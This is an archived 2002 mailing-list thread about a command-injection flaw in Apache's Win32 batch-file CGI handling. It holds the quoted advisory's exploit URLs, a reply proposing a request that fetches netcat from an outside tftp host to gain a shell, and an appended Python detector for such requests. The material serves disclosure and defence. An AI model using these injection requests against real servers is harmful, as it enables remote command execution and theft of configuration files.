This was a nice one. If this can do what I think, you could do something like
the following: retrieve your netcat with a request like this one, or perhaps
replacing the "+" with "%20" if it doesn't work.

http://host/cgi-bin/test-cgi.bat?|tftp+-i+tftp.mynetcat.com+GET+/nc.exe+c:\tmp

With netcat on the box I can think of a 1000 ways to get a cmd :-)

PS: This is just an idea, I haven't tried it yet.

-Replugge-

On Thu, 2002-03-21 at 18:06, Ory Segal wrote:
> Vulnerability in Apache for Win32 batch file processing - Remote command
> execution
>
> => Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com
>
> => Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
>
> => Vendor: Apache group
>
> => Product: Apache web server (Win32) - Running DOS batch files
> Tested on:
> - Apache 1.3.23
> - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which
>   enables this attack)
>
> => Severity: High, remote command execution and arbitrary file viewing.
>
> => CVE candidate: CAN-2002-0061
> (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061)
>
> => Summary: Because of the way Apache web server handles DOS batch scripts
> it is possible to execute remote commands on the web server by using the
> pipe ('|') character.
>
> ** IMPORTANT **
> The Apache 2.0.x installation is shipped with the default script
> /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that
> ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.
>
> => Description: When a request for a DOS batch file (.bat or .cmd) is sent
> to an Apache web server, the server will spawn a shell interpreter (cmd.exe
> by default) and will run the script with the parameters sent to it by the
> user. Because no proper validation is done on the input, it is possible to
> send a pipe character ('|') with commands appended to it as parameters to
> the CGI script, and the shell interpreter will execute them.
>
> Example:
>
> 1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
>
> This request will copy the httpd.conf file residing in the /conf directory
> of the Apache installation, into the virtual web root where it can be viewed
> by any user.
>
> 2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
>
> This will append the string "Foobar" to the index.html file residing in the
> virtual web root directory.
>
> 3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt
>
> This will create a file containing the directory listing of the C: drive,
> and will put the file in the virtual web root, where any user can read it.
>
> ** Notes:
>
> 1) URL-decoding is not provided by Apache except for the '+' character which
> is substituted by a space character.
>
> 2) Spilling the output into STDOUT would most likely cause Apache to write
> an error message since it expects the STDOUT of a CGI script to have an HTTP
> response format (potential HTTP headers followed by a mandatory blank line
> followed by a response body). Therefore in order to view the result of a
> command, it is recommended that you redirect the output to a file under the
> web server's virtual root.
>
> => Solution: Upgrade your Apache web server to: 1.3.24 (which should be
> available later today), or 2.0.34-beta (which will be published soon).
> Downloads are located at:
> http://www.apache.org/dist/httpd/
>
> <<apache_advisory.txt>>
>
> Ory Segal
> Sanctum, Inc.
> http://www.SanctumInc.com/

--
/* Rodrigo Gutierrez <rodrigoat_private> Trustix AS http://www.trustix.com */
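A defender-side check for the pattern the advisory describes, added here as an example and not part of the thread or of Sanctum's advisory: it scans Apache access-log lines for requests to any .bat or .cmd CGI script whose query string carries a pipe, which is what lets cmd.exe run appended commands. The combined-log layout is assumed and the sample lines are constructed; the first reuses example 3 from the advisory.

```python
import re
from urllib.parse import unquote_plus

# Apache access-log line (common/combined prefix): client ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# The advisory stresses that ANY .bat or .cmd script is affected, not only the shipped test-cgi.bat
BATCH_EXT_RE = re.compile(r'\.(bat|cmd)$', re.IGNORECASE)


def is_batch_cgi_injection(target):
    """True if the request targets a .bat/.cmd script and its query string carries a pipe."""
    path, _, query = target.partition('?')
    if not BATCH_EXT_RE.search(path):
        return False
    # Apache only turns '+' into a space here, so a literal '|' is what the advisory
    # describes; decoding the query as well is a deliberately conservative choice.
    return '|' in unquote_plus(query)


def scan_access_log(lines):
    """Return (ip, time, target) for every request matching the advisory's pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # skip lines that are not well-formed access-log entries
        if is_batch_cgi_injection(m.group('target')):
            hits.append((m.group('ip'), m.group('time'), m.group('target')))
    return hits


# Constructed sample log lines (not real traffic); the first reuses example 3 from the advisory.
SAMPLE_LOG = [
    r'10.0.0.5 - - [21/Mar/2002:18:06:00 -0500] "GET /cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt HTTP/1.0" 500 245',
    r'10.0.0.7 - - [21/Mar/2002:18:07:12 -0500] "GET /cgi-bin/test-cgi.bat?name=foo HTTP/1.0" 200 512',
    r'10.0.0.9 - - [21/Mar/2002:18:08:30 -0500] "GET /cgi-bin/other.CMD?%7Cecho+Foobar HTTP/1.1" 500 245',
    r'10.0.0.11 - - [21/Mar/2002:18:09:01 -0500] "GET /index.html?q=a|b HTTP/1.0" 200 1024',
    'this line is not an access-log entry',
]

if __name__ == '__main__':
    for ip, when, target in scan_access_log(SAMPLE_LOG):
        print(f'{when} {ip} -> {target}')
```

Only the two .bat/.cmd requests carrying a pipe are reported; a pipe in a query aimed at a non-batch resource is ignored, as is a batch CGI called with ordinary parameters.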
This archive was generated by hypermail 2b30 : Thu Mar 21 2002 - 14:41:51 PST